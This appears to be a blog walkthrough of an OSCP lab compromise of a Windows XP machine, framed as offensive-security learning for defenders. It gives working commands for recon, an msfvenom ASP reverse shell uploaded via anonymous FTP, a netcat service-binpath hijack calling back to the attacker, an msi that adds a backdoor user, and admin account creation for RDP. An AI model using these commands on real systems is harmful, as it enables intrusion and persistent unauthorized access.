I’ve been in the business of IT/Security for about 30 years now and I am always looking for ways to improve my skillset and understanding the various domains of security. One area I always found interesting is the offensive side of security. I find it extremely important because it gives you a better understanding of what’s possible from an adversary perspective which enables you to better understand your security gaps.
This is why a good buddy of mine (Aamir Lakhani) and I run a very simple 2-day workshop that walks you through an attack using the Mitre Att&ck knowledge base followed by some defensive measures. We hope it will convey that technology alone will not solve your security problem. The workshop walks through an offensive cyber mission using various automated tools such as Metasploit/Meterpreter, Unicorn and other tools.
My buddy is an expert in offensive tactics as he does it quite often, however for myself it’s kind of a side hobby. I am good at the automation tools and when it comes to purple teaming exercises to ensure proper detection of real-world attacks are in place. But that’s it. Well recently I decided on my own I will try to elevate my game a bit and learn how to attack machines a bit more manually. To do that I started a journey down the OSCP track. It’s a great course however the content is not super deep, but it gives you a really good framework or guideline to follow when attempting to attack a machine manually. The best feature would be the vulnerable machines in the lab that are available for you to test your hacking skills. This is where the true learning begins.
I am still going through the course but what I have learned so far is google is your best companion when you’re in the process of trying to own a machine. There is just so much information out there. People sharing their experiences in blogs. This information is invaluable, and I feel this course helps to bring out that very important fact to the student. With that said I want to share my one of my experiences compromising a system. Looking back, it’s a very simple hack on a XP machine riddled with vulnerabilities, but until you go through the process it’s an interesting journey to say the least.
Reconnaissance
First of all, to discover the machine I ran a nmap scan against the network looking for the 20 top ports that may be open for each system found.
Nmap -sT -A –top-ports=20 x.x.x.x-254 oG top-port-sweep.txt
After running the scan, the below information was presented on the machine I wanted to go after.
Host: x.x.x.x () Ports: 21/open/tcp//ftp//Microsoft ftpd/, 22/filtered/tcp//ssh///, 23/filtered/tcp//telnet///, 25/filtered/tcp//smtp///, 53/filtered/tcp//domain///, 80/open/tcp//http//Microsoft IIS httpd 5.1/, 110/filtered/tcp//pop3///, 111/filtered/tcp//rpcbind///, 135/filtered/tcp//msrpc///, 139/filtered/tcp//netbios-ssn///, 143/filtered/tcp//imap///, 443/filtered/tcp//https///, 445/filtered/tcp//microsoft-ds///, 993/filtered/tcp//imaps///, 995/filtered/tcp//pop3s///, 1723/filtered/tcp//pptp///, 3306/filtered/tcp//mysql///, 3389/open/tcp//ms-wbt-server?///, 5900/filtered/tcp//vnc///, 8080/filtered/tcp//http-proxy/// Seq Index: 127 IP ID Seq: Incremental
The information that grabbed my attention first was that it looked to be running FTP and IIS HTTP 5.1. Pretty old stuff so I figured I would start there. Before I went down that path I wanted to get more information on the device so I ran in the background Nikto for web security issues, gobuster for identify interesting directories on the website and a more in-depth nmap scan looking for vulnerabilities and software versions.
nikto -h x.x.x.x
gobuster -u http://10.11.1.39 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e
nmap -A -sV --script=default,vuln -p- --open -oA tcp_10.11.1.x 10.11.1.x
While those scans were running, I tried to connect to the machine via FTP and it let me in with using anonymous and a random email for the password. I was successfully able to upload a file to any directory using the PUT command which got me a bit excited. By the way when I did a DIR the I could see the following directory listing.
<DIR> AdminScripts
<DIR> ftproot
<DIR> iissamples
<DIR> Scripts
<DIR> wwwroot
Initial Shell Access
Armed with this knowledge I thought if I could find a shell that I could upload into the scripts directory and run it I might just get initial shell access. Since it was Microsoft IIS, I started hunting for an ASP shell. With Google by my side I found a great site that was basically a cheat sheet for reverse shells which pointed me in the right direction.
https://highon.coffee/blog/reverse-shell-cheat-sheet
Metasploit had some shells already there that I tried but those for whatever reason (probably human error) did not work. Doing a few more searches I found a site that reminded me that I can use msfvenom to create a shell.
msfvenom -p windows/shell_reverse_tcp LHOST=.x.x.x.x LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
Before I copied this to the scripts directory and called it from the web, I made sure I had Netcat running listening on 4443 on my attacker machine. Once I called it from the web, boom! I had a shell.
Privileged Escalation
I knew I was not going to be admin/system on the shell so next step – Privilege escalation. I started looking for various privilege escalation techniques for windows on the web and found a few sites which gave me a good starting point.
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
By the way I ran the command “SYSTEMINFO” on the shell to make sure of the OS type and patch level among a bunch of other interesting nuggets. I was able to verify it was XP service pack 1. With that in mind I started off with identifying local privilege vulnerabilities that might work. The first one that popped up was ms11-080. It’s a vulnerability that could allow elevation of privilege if an attacker logs on to a user's system and runs a specially crafted application.
The exploit was located below.
https://www.exploit-db.com/exploits/18176.
It was a python script so I couldn’t just run it on the windows machine. I needed to turn it into an EXE somehow. After a little searching I found the site below which pointed me in the direction to use PyInstaller.
http://pentest.tonyng.net/local-privilege-escalation-with-ms11-080/
I tried to convert it but for whatever reason (again probable user error) I was not able to get it to work. I was getting tired and lazy, so I started searching to see if one was already in the EXE format. I would not recommend this as there could be backdoors in there but figured at this point I was willing to take the risk. My searching revealed the below site which contained the EXE format of the local privilege escalation exploit.
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-080
I downloaded and copied to victim machine via FTP and ran it in the shell.
ms11-080.exe -O XP
It looked like it worked and put me into the C:\windows\system32 directory so I thought I had it. But then realized after I did not have access to create a user I was not escalated. I then realized that it must only work on XP Service Pack 3 and my victim machine was service pack 1. I tried a few other local privilege escalation exploits but none of them seemed to work. When I did try one of them which I think was ms11-062 and ran into some issues with compiling it using mingw-w32. I kept getting the below error. I was too frustrated so I moved on.
error: ‘__try’ undeclared (first use in this function); did you mean ‘__try1’?
I wanted a fresh angle, so I went back to google searching for privilege escalations for windows machines in general. Ran into a lot of the same sites but found this one.
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md.
I tried to do one of them called AlwaysInstallElevated. It’s a feature that Microsoft provides in group policy settings which will allow a regular user to install Microsoft Windows installer packages (MI) with system priv. I ran the below two command to see if the settings were set to 1 or not to see if it was active or enabled.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
One was but the other was not. If they were I could of went back to msfvenom to create an msi package, then run it. The commands are below.
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
Run on shell:
msiexec /quiet /qn /i C:\evil.msi
But since it was not enabled, I moved on to find another. Good trick for another time.
I found that on XP sp1 a service called upnphost could be changed since the permissions allow EVERYONE to modify it. So, I proceeded to modify the service giving it a Netcat reverse shell back to my attacker machine. Of course, I need upload nc.exe to the victim machine which I did via FTP. The following commands were entered into the shell.
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe x.x.x.x 1234 -e C:\WINDOWS\System32\cmd.exe"
Load as local system with no password:
sc config upnphost obj= ".\LocalSystem" password= ""
Show the changes took effect:
sc qc upnphost
All I need to do now is start the service, but it failed to start stating I was missing some dependencies.
Net start upnphost
Doing yet another search I found this site which gave me other commands to run if I ran into this dependency issue.
https://guif.re/windowseop#EoP%201:%20Incorrect%20permissions%20in%20services
Commands run below:
sc config SSDPSRV start= auto
net start SSDPSRV
Once I ran that I reran the net start upnphost service and which my attacker machine listing on port 1234 I got an admin shell, but it only lasted for about 30 secs then it was killed. Can you guess what I did next? Yep! I did another search and I can across this site.
Looking at the site I guess I could of just put a bat file in there and created a user and added them to the local admin group, but I saw this other crazy suggestion that if you first establish the Netcat shell and while it’s still alive create another Netcat shell back to you the shell stays open. It was weird but as long as you created the second shell on another listening port before the first one timed out it works.
Persistence
From there I was able to create another account and added to local admins group.
net user akg 123 /add && net localgroup administrators akg /add
Since 3389 was listening on the victim machine I connected with my new creds and now had an administrative remote desk top session.
As my journey continues, I plan to post more walk throughs in the future so stay tuned for more hacking adventures.
MITRE ATT&CK
If you’re a fan of MITRE ATT&CK below are the Tactics/Techniques used that were successful.
Command and Control – T1105 - Remote File Copy
Anonymous FTP to upload shell.asp
Persistence - T1100 Web Shell
msfvenom -p windows/shell_reverse_tcp LHOST=.x.x.x.x LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
Privilege Escalation - T1058 Service Registry Permissions Weakness
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe x.x.x.x 1234 -e C:\WINDOWS\System32\cmd.exe"
Load as local system with no password:
sc config upnphost obj= ".\LocalSystem" password= ""
Persistence - T1136 – Create Account
net user akg 123 /add && net localgroup administrators akg /add
Lateral Movement - T1076 – Remote Desktop
Rdesktop <IP Address>
Meet Anthony Giandomenico: The man behind "Illumin808"
Experienced Information Security Executive, Evangelist, Entrepreneur and Mentor with over 20 years of experience. In his current position he is focused on delivering knowledge, tools and methodologies to properly demonstrate advanced threat concept and defense strategy using a practical approach to security.
He has presented, trained and mentored on various security concepts and strategies at many conferences, trade shows and media outlets including a weekly appearance on KHON2-TV morning news “Tech Buzz” segment and Technology News Bytes on OC16, providing monthly security advice.
Mr. Giandomenico founded and managed Secure DNA Inc. a global security consulting company focused on protecting critical infrastructures such as financial institutions, hospitals, and government agencies. As a consultant Anthony provided expertise in many areas including security program development, defensive strategies, incident response and forensics procedures, security assessments, penetration testing, and security operations.
